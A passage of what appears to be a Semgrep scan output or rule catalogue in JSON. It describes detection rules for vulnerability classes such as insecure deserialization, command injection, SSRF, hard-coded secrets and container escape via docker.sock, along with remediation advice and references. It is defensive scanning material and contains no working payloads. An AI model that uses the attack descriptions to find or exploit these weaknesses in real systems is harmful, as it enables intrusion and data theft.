forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `HttpOnly` flag is either missing or disabled. The `HttpOnly` cookie flag instructs the browser to forbid client-side JavaScript to read the cookie. If JavaScript interaction is required, you can ignore this finding. However, set the `HttpOnly` flag to `true` in all other cases. If this wasn't intentional, it's recommended to set the HttpOnly flag to true so the cookie will not be accessible through client-side scripts. This approach ensures session cookies are secure by default. It is also possible to use the flask-talisman extension to enforce a secure configuration."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","id":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","name":"python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false","properties":{"precision":"very-high","tags":["CWE-1004: Sensitive Cookie Without 'HttpOnly' Flag","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-app-config-httponly-false.flask-cookie-app-config-httponly-false"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","id":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","name":"python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-pickle-fastapi.tainted-pandas-pickle-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"help":{"markdown":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing)\n - [https://www.npmjs.com/package/serve-index](https://www.npmjs.com/package/serve-index)\n - [https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/](https://www.acunetix.com/blog/articles/directory-listing-information-disclosure/)\n","text":"Directory listing/indexing is enabled, which may lead to disclosure of sensitive directories and files. It is recommended to disable directory listing unless it is a public resource. If you need directory listing, ensure that sensitive files are inaccessible when querying the resource."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","id":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","name":"javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing","properties":{"precision":"very-high","tags":["CWE-548: Exposure of Information Through Directory Listing","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-directory-listing.express-check-directory-listing"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url)\n - [https://docs.diesel.rs/master/diesel/index.html](https://docs.diesel.rs/master/diesel/index.html)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.diesel.mysql-connection-url.mysql-connection-url","id":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","name":"rust.secrets.diesel.mysql-connection-url.mysql-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.diesel.mysql-connection-url.mysql-connection-url"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"help":{"markdown":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"The libxml2 library is used to parse XML. When auditing such code, make sure that either the document being parsed is trusted or that the parsing options are safe to consume untrusted documents. In such case make sure DTD or XInclude documents cannot be loaded and there is no network access."},"helpUri":"https://semgrep.dev/r/cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","id":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","name":"cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.libxml2.security.libxml2-audit-parser.libxml2-audit-parser"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"JWT token detected"},"help":{"markdown":"JWT token detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token)\n - [https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/](https://semgrep.dev/blog/2020/hardcoded-secrets-unverified-tokens-and-other-common-jwt-mistakes/)\n","text":"JWT token detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-jwt-token.detected-jwt-token","id":"generic.secrets.security.detected-jwt-token.detected-jwt-token","name":"generic.secrets.security.detected-jwt-token.detected-jwt-token","properties":{"precision":"very-high","tags":["CWE-321: Use of Hard-coded Cryptographic Key","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-jwt-token.detected-jwt-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"help":{"markdown":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html)\n - [https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/](https://redfoxsec.com/blog/insecure-volume-mounts-in-docker/)\n - [https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html](https://blog.quarkslab.com/why-is-exposing-the-docker-socket-a-really-bad-idea.html)\n","text":"The Dockerfile(image) mounts docker.sock to the container which may allow an attacker already inside of the container to escape container and execute arbitrary commands on the host machine."},"helpUri":"https://semgrep.dev/r/dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","id":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","name":"dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount","properties":{"precision":"very-high","tags":["CWE-269: Improper Privilege Management","CWE-862: Missing Authorization","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: dockerfile.security.dockerd-socket-mount.dockerfile-dockerd-socket-mount"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"help":{"markdown":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"The regular expression identified appears vulnerable to Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible, re-write the regex so as not to leverage backtracking or use a library that offers default protection against ReDoS."},"helpUri":"https://semgrep.dev/r/python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","id":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","name":"python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.regex.tainted-regex-stdlib-flask.tainted-regex-stdlib-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"help":{"markdown":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection)\n - [https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/](https://clement.notin.org/blog/2020/04/15/Server-Side-Template-Injection-(SSTI)-in-ASP.NET-Razor/)\n","text":"User-controllable string passed to Razor.Parse. This leads directly to code execution in the context of the process."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.razor-template-injection.razor-template-injection","id":"csharp.dotnet.security.razor-template-injection.razor-template-injection","name":"csharp.dotnet.security.razor-template-injection.razor-template-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.razor-template-injection.razor-template-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"help":{"markdown":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n - [https://www.regular-expressions.info/catastrophic.html](https://www.regular-expressions.info/catastrophic.html)\n","text":"Detected `$REQ` argument enters calls to `RegExp`. This could lead to a Regular Expression Denial of Service (ReDoS) through catastrophic backtracking. If the input is attacker controllable, this vulnerability can lead to systems being non-responsive or may crash due to ReDoS. Where possible avoid calls to `RegExp` with user input, if required ensure user input is escaped or validated. "},"helpUri":"https://semgrep.dev/r/javascript.express.regexp-redos.regexp-redos","id":"javascript.express.regexp-redos.regexp-redos","name":"javascript.express.regexp-redos.regexp-redos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.regexp-redos.regexp-redos"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"help":{"markdown":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape)\n - [https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates](https://edx.readthedocs.io/projects/edx-developer-guide/en/latest/preventing_xss/preventing_xss_in_django_templates.html#html-escaping-translations-in-django-templates)\n - [https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code](https://docs.djangoproject.com/en/3.1/topics/i18n/translation/#internationalization-in-template-code)\n","text":"Translated strings will not be escaped when rendered in a template. This leads to a vulnerability where translators could include malicious script tags in their translations. Consider using `force_escape` to explicitly escape a translated text."},"helpUri":"https://semgrep.dev/r/python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","id":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","name":"python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.audit.xss.template-blocktranslate-no-escape.template-blocktranslate-no-escape"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"help":{"markdown":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting)\n - [https://www.owasp.org/index.php/HTTP_Response_Splitting](https://www.owasp.org/index.php/HTTP_Response_Splitting)\n","text":"Older Java application servers are vulnerable to HTTP response splitting, which may occur if an HTTP request can be injected with CRLF characters. This finding is reported for completeness; it is recommended to ensure your environment is not affected by testing this yourself."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.http-response-splitting.http-response-splitting","id":"java.lang.security.audit.http-response-splitting.http-response-splitting","name":"java.lang.security.audit.http-response-splitting.http-response-splitting","properties":{"precision":"very-high","tags":["CWE-113: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.http-response-splitting.http-response-splitting"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"the `encoding` argument to Popen is only available on Python 3.6+"},"help":{"markdown":"the `encoding` argument to Popen is only available on Python 3.6+\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2)\n","text":"the `encoding` argument to Popen is only available on Python 3.6+"},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python36.python36-compatibility-Popen2","id":"python.lang.compatibility.python36.python36-compatibility-Popen2","name":"python.lang.compatibility.python36.python36-compatibility-Popen2","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python36.python36-compatibility-Popen2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Snyk API Key detected"},"help":{"markdown":"Snyk API Key detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Snyk API Key detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","id":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","name":"generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-snyk-api-key.detected-snyk-api-key"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Database instance has no logging. Missing logs can cause missing important event information."},"help":{"markdown":"Database instance has no logging. Missing logs can cause missing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"Database instance has no logging. Missing logs can cause missing important event information."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","id":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","name":"terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging","properties":{"precision":"very-high","tags":["CWE-311: Missing Encryption of Sensitive Data","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-db-instance-no-logging.aws-db-instance-no-logging"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"help":{"markdown":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion)\n - [https://cwe.mitre.org/data/definitions/704.html](https://cwe.mitre.org/data/definitions/704.html)\n","text":"'Integer.toHexString()' strips leading zeroes from each byte if read byte-by-byte. This mistake weakens the hash value computed since it introduces more collisions. Use 'String.format(\"%02X\", ...)' instead."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","id":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","name":"java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion","properties":{"precision":"very-high","tags":["CWE-704: Incorrect Type Conversion or Cast","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.bad-hexa-conversion.bad-hexa-conversion"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array)\n - [https://docs.python.org/3/library/os.html](https://docs.python.org/3/library/os.html)\n - [https://docs.python.org/3/library/subprocess.html#subprocess.Popen](https://docs.python.org/3/library/subprocess.html#subprocess.Popen)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n - [https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html](https://stackless.readthedocs.io/en/v2.7.16-slp/library/commands.html)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","id":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","name":"python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.os.tainted-os-command-stdlib-flask-secure-if-array.tainted-os-command-stdlib-flask-secure-if-array"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"help":{"markdown":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4)\n - [https://cwe.mitre.org/data/definitions/326.html](https://cwe.mitre.org/data/definitions/326.html)\n - [https://www.pycryptodome.org/src/cipher/cipher](https://www.pycryptodome.org/src/cipher/cipher)\n","text":"Detected ARC4 cipher algorithm which is considered insecure. This algorithm is not cryptographically secure and can be reversed easily. Use secure stream ciphers such as ChaCha20, XChaCha20 and Salsa20, or a block cipher such as AES with a block size of 128 bits. When using a block cipher, use a modern mode of operation that also provides authentication, such as GCM."},"helpUri":"https://semgrep.dev/r/python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","id":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","name":"python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.pycryptodome.security.insecure-cipher-algorithm-rc4.insecure-cipher-algorithm-rc4"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","id":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","name":"python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.hardcoded.headers.hardcoded-basic-token.hardcoded-basic-token"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists 